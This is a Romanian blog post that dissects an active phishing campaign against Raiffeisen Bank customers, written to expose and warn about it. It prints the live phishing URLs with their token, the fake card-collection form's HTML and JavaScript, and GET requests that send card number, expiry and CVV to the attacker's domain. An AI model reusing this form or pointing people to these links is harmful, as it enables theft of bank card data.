Furtul datelor de pe un card Raiffeisen Bank

In cele ce urmeaza va fi explicata o scamatorie prin care se pescuiesc datele unui card Raiffeisen Bank.

Linkul ascuns sub acel buton:

https://servinf.ballson.co.uk/servicii-online/internet-banking/?token=

Cu token:

aLrZiNLkmhwMYwKRxcviqkIVHfJGujVAoubqpliHoqMvcenzNnkETGWZKsQwmxKtGgkyWihsXCzWjVAVyXFcBrKhMQDXaeMqeCdnQZDtAEnJGiOHVFTZZlfvMzTOcNxPBxgPyLTIvTfFCMWQlnVwfVhjkomvKrIHpbtkzYKLSSoCNnmniNuhAdUQMPRRDYeWmpDYmUgmbDoCSfcXJehLttWpzKXjGoyNANhFwJXXOxUgBNzovyyltEmzGJhqwgmONKlEaEwgJkOSJWWsviENaHlcIiXwxZHxdXggcceNCOwtLxlxJgOoPixnFABcXJGqRleANmXEbKoBzYDXZtLDGIKXtatWOeyRgYQxzpqudWkRKyEfVROHLXgvCIOVkKFMUiKJbaGkPjCPQwQhcASUJXVvOyuEHTXNdJvEMSuDaiTJvSPEfRfRuBGjutmcBEFijGjcoIEmXdcuFFPZuHqIoCYuyfPhdAAXHloDbSLrfDdsSrJNDPTOvSUVcqAHsQyLJbuzPBhmeVLgoKIvhOnIHXRPHUSlKiayNcnitZGiruMFUUJITStlXAgTbKcDIWMJrCKeGYOmxmYjCXmRxTodIZkTfmqURqcUlaDXqvchHxfNKzusnAzvKiNiFWysJzdJJJqRIMxwYjGsCEaTZerNEvlrdITKrKokKVppAAbYRAtJevpkfVNCTBCykMDUcXqgKOkaFbKlXNTryHEGODaBFcKCKSMUYYVEZtYgRWVcqMgDzVCnYMLcMdCuoKfxXLXlctdtqDVVOCoTvbRdEbkyeuSJjvncSPtsdVeqSrBrhrlLYBRDlJRPKiVNGFCVzgqFPsGkXLFBKBtSYtmNkLvhLKoXQDtvIXSQgFjeZiKtDgDXWxVfjFEGOuHzmJcPJjwzOZOsUTosnWPvABGEzuXJBQJtHUBpayAuIpSZaCWkwkuCtgdIbOLZurPdJJZSoNMJUaAPQYApxYsVmgNGcocWaHCsGxHgrTSWryWGCRlCMTftfftvAvdYvqPyLAVNSqpJuTWrefpxXjxgzwGBTlnpfjKblrcQxCHtogGphnSLLDzLPYQJMfXnMCzpzLhZPhkGWebiLEwlUBSdaNsZwsvSaObtWQNwpulbOAvbPKIvinkxZOauVVlPwbcmYrVeCZebuMdNxgHiGyWOujvVAktfRKjMlokoVgfdFEAkxAKLhSkTzxjCviwdTEoQICgivMXgRlzBrkxPkKTKfxlHQdcMxpAWIZpeHDbRBCXFhDNuSIncJjdzpCPZXbubtxFNbikAjHkUSEoaqcQKNoFzfcFZmtyETniwvyueZHWMIzXGwVJWUiybVINJOZMfNXPVZDdZlSqxgmdUAnRNLAJVJeXJLecWXQyWxeNXaRzINbWgtaQcocwrXbZBRHmnNRJhqqRWoussXiMlbWkCrQpkiltexJwWBUdmVOiycZCwkLzKpvZLAkYqyGLTTIQlHnSGcegozrXGvfSngxTDSSEtfcEHGbcQZGruimAHXRreMCQnTsFhMXWguEuRmlSeptabqwoqUMFtTzXFRsfUUACHdgvphKjgDSIqEtNJSnnhxJUtHDjiMaDuINbxKOuIphRPLVMtNQaCuuXGDWZzIYXGmIIjCrRDNZRWbenyPboCkHcgyAlXYKMmmHcDFkrVpJNezcTdpJBgQgGeFDZDFjpGKZmdRuouYIGyzWdDPxsYTqloXwUjccdGQHKlLEpJxjBRDHoMxuNJhjrcXamgKlorhuPhaXXxhPpeVXNbhLObDsPfrrficNZLBWRcBltgpFnDvxrimafrBWpjTOghEqfiLxnbdkcffNfKqLMYhclgjGAjKpaVCcxjucHvmShlwobJxQerWlSuayCDgwevuXQXcBKfNJoCudrMYyMnUOyitDTcswYuuChHdzIxPsYCqeUWAbLBimDQFfIdkkjZyoqjZkJfnKMRmIznKrtpqkSTtfjmSCqYkiuAtvhVgqEASUgtzkVhDJchbeiwMXdkcDeaKFWTGaUWtWaUWLiDfSMViZZkWjNgbXhPuRcmWwBnkneLxEbGAgFejnxdXEHlRWYmhCocLyzhTUMRmHoifzCNtXDjDUgfFWoFYXiIcAXutdnMRzwQQJZuhwRsrThTthStJvoBZQKnNktLrnNQNauFwlWgCgCNsvRGImLgmWBAibUskQhJXiHWcsqaFPKPDEezXQdiLMYwfykaRCrTkhSVMsWRvBOlPLbXlbsjWyLBzrQqttnLWWLvqFfFuDiKVcFJYCVoIJkoQyhaMSJHsVrtneNtzSteMTYLlWBhItTIKhgKUVuiQgzjMtRXnJiZrcbSAJzVFgxpzmHHuomLubTdqNNXdl&sacjioasp=6545321564589465320031215848945622031564897846512300321564894856200031256498465418798789456489&csopsnc=WIlKVDJWlZSRqQXaNrvQTJScIMEmxxhbRXFUBZRnouQRnDdOesWvNAQbBwDKJrhBVTymBJUgcYRINpcIsUHgvtsLnaRYDogtFdjnniNyfSrUnDLNOfjkRKtnsjiMdtIRJxEgShjIBILdBRdBVXZznmbCsYGwxdVsaOMRpHgbQfjafzUP

**Am scos intentionat acel parametru afara separat. Orice incercare de a accesa acel link trebuie sa fie pe deplin asumata.

Unde se face un GET pe:

https://servinf.ballson.co.uk/%2Foperatiuni-curente/v.21.1235420120122/persoane-fizice/produsele-noastre//?csrfmiddlewaretoken=3PmA544hOOfMJPGF710I1bu6jEjHGTj2QZZPe0wmHgbkpKp8xlkBk3khenOWx1l6&number=2d2dd&password=sdasss

Cu un payload:

csrfmiddlewaretoken: 3PmA544hOOfMJPGF710I1bu6jEjHGTj2QZZPe0wmHgbkpKp8xlkBk3khenOWx1l6
number: 2d2dd
password: sdasss

Si cu un GET pe:

https://servinf.ballson.co.uk/persoane-fizice/produsele-noastre//v8032156/account/login/

Avand in referinta request-ului:

https://servinf.ballson.co.uk/%2Foperatiuni-curente/v.21.1235420120122/persoane-fizice/produsele-noastre//?csrfmiddlewaretoken=3PmA544hOOfMJPGF710I1bu6jEjHGTj2QZZPe0wmHgbkpKp8xlkBk3khenOWx1l6&number=222&password=23222

Adica exact ce am introdus in primul pas.

Si se raspunde cu o pagina aproape identica de Raiffeisen Bank:

Se poate observa ca acest atac e cat de cat bine pus la punct. Aici se face o simpla verificare a cardului.

In principiu ideea atacului e destul de buna, dar scapa anumite aspecte care pot pune pe ganduri victima. Cum ar fi textul de pe inputul cu “data expirariin”. In rest totul pare 1 la 1 cu ceva real.

Form care va face un GET:

<form method="get" action="/persoane-fizice/produsele-noastre//v1558900348893/account/login/"><input type="hidden" name="csrfmiddlewaretoken" value="sCdVsCtMWrqSYCXIGmPL8pdI4LXsrLpLfMQaByVRPTmqExGb6G9Erh3TZusHiTrP">
            <input type="tel" required="" name="atmCard" maxlength="16" minlength="16" placeholder="Numărul cărții de credit">
            
                <input type="tel" class="inputat" name="aTMExpiryDateMM" id="" required="" maxlength="5" minlength="5" onkeyup="formatString(event);" placeholder="Data expirăriin">
                
            
            <div class="inputing">
                <input type="tel" class="inputat1" id="" name="atmPin" required="" maxlength="3" minlength="3" placeholder="CVV">
                <img src="https://cdn.webcorp.com/img/faq/credit-card-cvv.png" alt="" width="82px" height="50px" style="margin: 17px;">
            </div>
            <input type="submit" style="background-color:#fff200; color: #000; font-family: Arial, Helvetica, sans-serif; font-weight: 700; font-size: 16px; border-color: #d9d9dd; " value="Continua">
           
            
        </form>

Ceva extrem de periculos despre care am mai amintit in alte atacuri bancare e ca inputul:

<input type="tel" required="" name="atmCard" maxlength="16" minlength="16" placeholder="Numărul cărții de credit">

Are un autocomplet:

Iar validarile din spate fac aproape identica aceasta pagina cu una adevarata:

<script>
		function formatString(e) {
			var inputChar = String.fromCharCode(event.keyCode);
			var code = event.keyCode;
			var allowedKeys = [8];
			if (allowedKeys.indexOf(code) !== -1) {
			return;
			}
			
			event.target.value = event.target.value.replace(
			/^([1-9]\/|[2-9])$/g, '0$1/' // 3 > 03/
			).replace(
			/^(0[1-9]|1[0-2])$/g, '$1/' // 11 > 11/
			).replace(
			/^([0-1])([3-9])$/g, '0$1/$2' // 13 > 01/3
			).replace(
			/^(0?[1-9]|1[0-2])([0-9]{2})$/g, '$1/$2' // 141 > 01/41
			).replace(
			/^([0]+)\/|[0]+$/g, '0' // 0/ > 0 and 00 > 0
			).replace(
			/[^\d\/]|^[\/]*$/g, '' // To allow only digits and `/`
			).replace(
			/\/\//g, '/' // Prevent entering more than 1 `/`
			);
		}
		</script>

Se face un GET pe:

https://servinf.ballson.co.uk/persoane-fizice/produsele-noastre//v1558900348893/account/login/?csrfmiddlewaretoken=sCdVsCtMWrqSYCXIGmPL8pdI4LXsrLpLfMQaByVRPTmqExGb6G9Erh3TZusHiTrP&atmCard=1234567891234567&aTMExpiryDateMM=02%2F23&atmPin=333

Cu payload-ul:

csrfmiddlewaretoken: sCdVsCtMWrqSYCXIGmPL8pdI4LXsrLpLfMQaByVRPTmqExGb6G9Erh3TZusHiTrP
atmCard: 1234567891234567
aTMExpiryDateMM: 02/23
atmPin: 333

Si cam aici se incheie inselatoria. Dupa acest pas nu se mai intampla nimic decat un redirect spre aceeasi pagina. Datele cardului sunt trimise si stocate. Ce s-ar mai putea intampla dupa acest pas ar fi mai un 3D Secure screen care sa apara in cazul unui card valid, care sa si valideze o tranzactie. Dar probabil autorii acestui atac se bazeaza doar pe stocarea datelor si vor incerca sa le interogheze sa vada ce sume se pot extrage de pe ele fara o eventuala interventie de 3D Secure.

Cine e in spatele acestei smecherii?

E greu de spus pentru ca toata treaba pare a fi facuta pe un domeniu fantoma de uk inregistrat anul asta, si de altfel lucrurile sunt prea bine traduse motamo. Ei nu folosesc nici mizerii de url-uri cum au mai fost intalnite in trecut cu /abracadabra/cocojambo/ ci aici ei merg pe /servicii-online/internet-banking/ si mai folosesc ancora ca /persoane-fizice/produsele-noastre//v123032566641/account/login/

O alta chestie destul de interesanta e ca ei si-au pus un certificat wildcard pentru mai multe posibile subdomenii pe acel root domain:

Ceea ce probabil inseamna ca mai au si alte tipuri de atacuri acolo tinute pe alte subdomenii.

*Orice incercare de a reproduce acest atac sau de a-l investiga trebuie sa fie asumata. Acest atac inca este activ la momentul raportului.

Leave a Reply